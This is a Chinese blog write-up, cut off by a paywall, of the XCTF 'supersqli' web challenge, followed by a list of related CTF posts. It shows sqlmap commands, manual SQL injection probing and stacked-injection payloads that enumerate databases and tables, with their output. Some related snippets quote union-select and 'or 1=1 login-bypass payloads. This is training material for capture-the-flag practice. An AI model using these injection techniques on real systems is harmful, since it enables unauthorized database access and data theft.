攻防世界web解题[进阶](二)

最新推荐文章于 2024-03-02 12:28:22 发布
最新推荐文章于 2024-03-02 12:28:22 发布
阅读量546 收藏 1
点赞数
分类专栏: 《从0到1:CTFer成长之路》
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46703850/article/details/114401659
版权
本文介绍了在攻防世界中的几个Web安全挑战,包括supersqli的SQL注入解题过程,使用sqlmap和手工注入获取数据库信息,以及ics-06的任意文件读取漏洞利用,通过BurpSuite进行爆破获取flag。同时,讨论了warmup题目的文件读取漏洞,分析了绕过过滤的策略。
摘要由CSDN通过智能技术生成

攻防世界web解题[进阶](二)


介绍:记录解题过程

5.supersqli

题目描述:随便注

sqlmap爆破(sql注入)

  • <1>.sqlmap爆当前数据库信息
python sqlmap.py -u "http://111.200.241.244:49359/?inject=1" --current-db

[16:37:04] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.3.11, Nginx 1.16.1
back-end DBMS: MySQL 5 (MariaDB fork)
[16:37:04] [INFO] fetching current database
[16:37:04] [INFO] resumed: supersqli
current database: 'supersqli'
  • 得到数据库名supersqli
  • <2>.sqlmap.列出指定数据库所有的表名
python sqlmap.py -u "http://111.200.241.244:49359/?inject=1" -D supersqli --tables
  • 发现sqlmap爆不出表名
  • 查看源码,看到了这句话,额…sqlmap看来用不了了,那只能手工注入了
<!-- sqlmap是没有灵魂的 -->

手工注入

/?inject=2-1 的结果与 /?inject=2相同,说明不存在数字型注入
尝试 /?inject=2' 发现页面回显如下,说明存在字符型注入

error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''2''' at line 1
  • 尝试了各种注入都不行,用堆叠注入可以:

<1>.查看数据库名:

/?inject=1';show databases;#
  • 回显
array(1) {
  [0]=>
  string(11) "ctftraining"
}

array(1) {
  [0]=>
  string(18) "information_schema"
}

array(1) {
  [0]=>
  string(5) "mysql"
}

array(1) {
  [0]=>
  string(18) "performance_schema"
}

array(1) {
  [0]=>
  string(9) "supersqli"
}

array(1) {
  [0]=>
  string(4) "test"
}

<2>. 查看表名

1';show tables;#

array(1) {
  [0]=>
  string(5) "words"
}

array(1) {
  [
最低0.47元/天 解锁文章
一个平凡de人
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQLmap实战记录
积木网络
08-22 1万+
【-u/--url="url"】 #后面接目标网址,表示测试的目标地址。 【-v/--level=number】 #number=[0-5],表示测试结果的详细程度。数值越大,内容越详细。 sqlmap.py -u “url” -v 0-5 或 sqlmap.py --url="url" --level=0-5 通过以上参数,会得到: 1、目标的操作系统信息 2、数据库的类
sqlmap使用方法
tothemoon的博客
03-03 439
直接进入正题: 环境:python2.7 python2 sqlmap.py -u “这里插入url地址” --data=“这里是注入点的变量名=1” python2 sqlmap.py -u “这里插入url地址” --data=“这里是注入点的变量名=1” --dbs 爆数据库库名 python2 sqlmap.py -u “这里插入url地址” --data=“这里是注入点的变量名=1...
攻防世界-supersqli
m0_63563528的博客
03-28 510
题目来源:强网杯 参考资料:金帛师傅的http://t.csdn.cn/KmxUY
sqlmap练习
m0_58265086的博客
08-27 126
1.输入sqlmap打开软件2. 获取数据库cms中对应表3.获取cms中cms_users表下对应的列名4.获得管理员密码输入:sqlmap.py -u"http://10.9.75.31/cms/show.php?
sqlmap在kali中的应用及ctfhub实战
2301_77004573的博客
07-08 1310
工具一把嗦固然方便,但仍不能忽视对原理的理解,毕竟常有sqlmap跑不出来的题目,为了检验自己对sql注入的掌握情况,之后也会补一篇手工注入的文章。
BUUCTF web入门题目每日两道(一)
horiozn1709的博客
02-03 1214
[极客大挑战 2019]EasySQL 1 该题目需要同时输入用户名和密码,在用户名处输入万能密码‘or 1=1 # ,密码处输入任意字符即可得到flag [HCTF 2018]WarmUp 1 php 代码审计问题 首先看页面源码 注意到在body中注释掉了 source.php ,所以我们直接访问source.php 得到源码: <?php highlight_file(__FILE__); classemmm { pu...
攻防世界—-(web进阶)FlatScience–WP
12-14
在这个“攻防世界—-(web进阶)FlatScience–WP”的挑战中,我们需要解决一个Web安全相关的谜题。这个谜题涉及到多个技术点,包括Web应用漏洞利用、数据库注入、PDF文件处理以及哈希算法的应用。 首先,我们注意到...
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953659
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
攻防世界杂项津门杯2021-m1
11-14
攻防世界杂项津门杯2021-m1,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127840757
网络安全web方向入门题合集
dra_p0p3n's blogs
08-15 4058
这是我大三在实习的时候做的一些题目,以后准备搞人工智能方向,应该也不会再接触网安了,就在这里汇总一下之前做的简单题吧,虽然简单但是也用了很多功夫去写这些,提高也很大,以此留作纪念吧。
SQLMap实战——RDCTF靶机训练
qq_50647304的博客
09-12 293
用rdctf的题目练习 开启环境进入靶机 找到注入点,用sqlmap测试能否注入: 跑完以后发现能注入,输入python sqlmap.py -u “url” --dbs 查询数据库: 选择数据库rjxy,输入python sqlmap.py -u “url” -D rjxy --tables 查询数据表: 选择manager表,输入 ...
bugku SQL注入题目合集
xuchen16的博客
09-30 2629
转载自:http://www.northity.com/2018/06/12/Bugku%E9%A2%98%E7%9B%AE%E9%9B%86%E9%94%A60x02/ SQL注入题目合集 这是一个神奇的登陆框 传送门 在用户名的后面加一个\可以看到报错,应该是能够报错注入或者联合查询之类的 但是最近学到了一些骚套路,先来看看sqlmap sqlmap 直接burp抓包另存为一个t...
[极客大挑战 2019]LoveSQL
Braindance
03-03 241
顶端の告诫:用 sqlmap没有灵魂的 尝试万能密码(其实没卵用) 'or 1=1 # 任意密码 这道题是常规的sql注入,测注入点、查字段数、爆库、爆字段值、爆表。组合拳 字段数: 1' order by 3 # 爆库: 1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() # geekuser,l0ve1ysq1 爆字段值: 1' u
记录攻防世界关卡 supersqli
qq_56559508的博客
11-13 262
攻防世界关卡 supersqli
攻防世界web--supersqli
m0_60715541的博客
10-27 316
一道攻防世界上面的sql注入
攻防世界WP-web-supersqli
wallacegen的博客
09-16 319
这是一道sql注入的题目。首先在输入框输入1和2,能够分别返回查询数据。可以看到url为http://220.249.52.133:31003/?inject=1,初步推断inject为注入点。 我们输入1',报错。 之前有考虑用sqlmap来做,但是没做出来= = ,网页源代码里面也有提示<!-- sqlmap没有灵魂的 -->,但是从sqlmap的结果可以知道,使用的database为supersqli 尝试手工注入。 ...
【ctfshow--sql注入】
最新发布
qq_74240553的博客
03-02 968
ctfshow--sql
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值